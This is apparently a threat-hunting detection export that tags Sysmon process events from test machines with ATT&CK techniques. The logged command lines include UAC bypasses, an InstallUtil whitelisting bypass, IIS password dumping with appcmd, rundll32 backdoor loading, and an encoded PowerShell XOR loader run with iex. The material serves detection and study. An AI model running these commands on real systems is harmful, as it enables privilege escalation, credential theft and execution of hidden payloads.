365ABB72-6998-5CD7-0000-00104E422200 + 2740 + C:\Python27\python.exe + python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557670689.589507,2019-05-12T18:18:09.589507+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16451 + + + + + 
Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 14:18:03.558 + 365ABB72-2B1B-5CD8-0000-0010CCC92500 + 3320 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-252D-5CD8-0000-001019E20300 + 2800 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1606412291.655964,2020-11-26T21:38:11.655964+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2362770 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-11-26 17:38:11.175 + 00247C92-E803-5FBF-0000-0010F2BFB40C + 16980 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" + C:\windows\system32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-3404-5FBE-0000-0020E0C90600 + 0x6c9e0 + 1 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-E803-5FBF-0000-0010CDB9B40C + 17336 + C:\Windows\System32\taskhostw.exe + taskhostw.exe $(Arg0) + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1560583325.973009,2019-06-15T11:22:05.973009+04:00,,Threat,High,"Found 
User (IEWIN7\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7681 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:22:05.660 + 365ABB72-9C9D-5D04-0000-001039CE1600 + 172 + C:\Windows\System32\wscript.exe + 5.8.7600.16385 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983 + 365ABB72-9C8E-5D04-0000-0010D0421600 + 540 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435993.225412,2019-07-30T01:33:13.225412+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4900 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:13.169 + 747F3D96-6619-5D3F-0000-0010FDE78600 + 
5116 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.964573,2019-05-27T05:29:19.964573+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5973 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.924 + 365ABB72-3D6F-5CEB-0000-001072D7FF00 + 3640 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
-nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcA
XQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564840229.461449,2019-08-03T17:50:29.461449+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 13:50:28.662 + 747F3D96-9124-5D45-0000-00103B986101 + 6236 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-9124-5D45-0000-001022926101 + 3180 + C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe + "C:\Users\IEUser\AppData\Local\Temp\fubuki.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564831398.715586,2019-08-03T15:23:18.715586+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5407 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 11:23:17.636 + 747F3D96-6EA5-5D45-0000-001032CCE100 + 6068 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6EA5-5D45-0000-00107AC9E100 + 932 + C:\Windows\SysWOW64\WerFault.exe + C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1558969963.990983,2019-05-27T19:12:43.990983+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /groups ) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6170 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:38.270 + 365ABB72-FE66-5CEB-0000-0010C7F80B00 + 1168 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /groups + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-FE66-5CEB-0000-001058F50B00 + 3256 + C:\Windows\System32\cmd.exe + cmd.exe /c whoami /groups + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1628379198.562808,2021-08-08T03:33:18.562808+04:00,,Threat,Low,Found 
User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 557006 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:15.285 + 747F3D96-183B-610F-0000-0010DC6CD400 + 11324 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00000000-0000-0000-0000-000000000000 + 1108 + ? + ? 
+ +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.544 + 747F3D96-9F61-5E75-0000-001056711E00 + 7380 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.544 + 747F3D96-9F61-5E75-0000-001056711E00 + 7380 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 
windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\sysprep\sysprep.exe , Parent CommandLine ("C:\Windows\System32\sysprep\sysprep.exe") in directory : ( C:\Windows\system32\WindowsPowerShell\v1.0\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17729 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:51.728 + 365ABB72-28D3-5CDA-0000-001088C71300 + 3976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\WindowsPowerShell\v1.0\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002045350100 + 0x13545 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-28D3-5CDA-0000-00106DC31300 + 3068 + C:\Windows\System32\sysprep\sysprep.exe + "C:\Windows\System32\sysprep\sysprep.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 
Execution detected,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.544 + 747F3D96-9F61-5E75-0000-001056711E00 + 7380 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17729 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:51.728 + 365ABB72-28D3-5CDA-0000-001088C71300 + 3976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\WindowsPowerShell\v1.0\ + IEWIN7\IEUser + 
365ABB72-26E1-5CDA-0000-002045350100 + 0x13545 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-28D3-5CDA-0000-00106DC31300 + 3068 + C:\Windows\System32\sysprep\sysprep.exe + "C:\Windows\System32\sysprep\sysprep.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424081 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.171 + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 00000000-0000-0000-0000-000000000000 + 1216 + ? + ? 
+ +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424081 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.171 + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 00000000-0000-0000-0000-000000000000 + 1216 + ? + ? 
+ +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424081 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.171 + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 00000000-0000-0000-0000-000000000000 + 1216 + ? + ? 
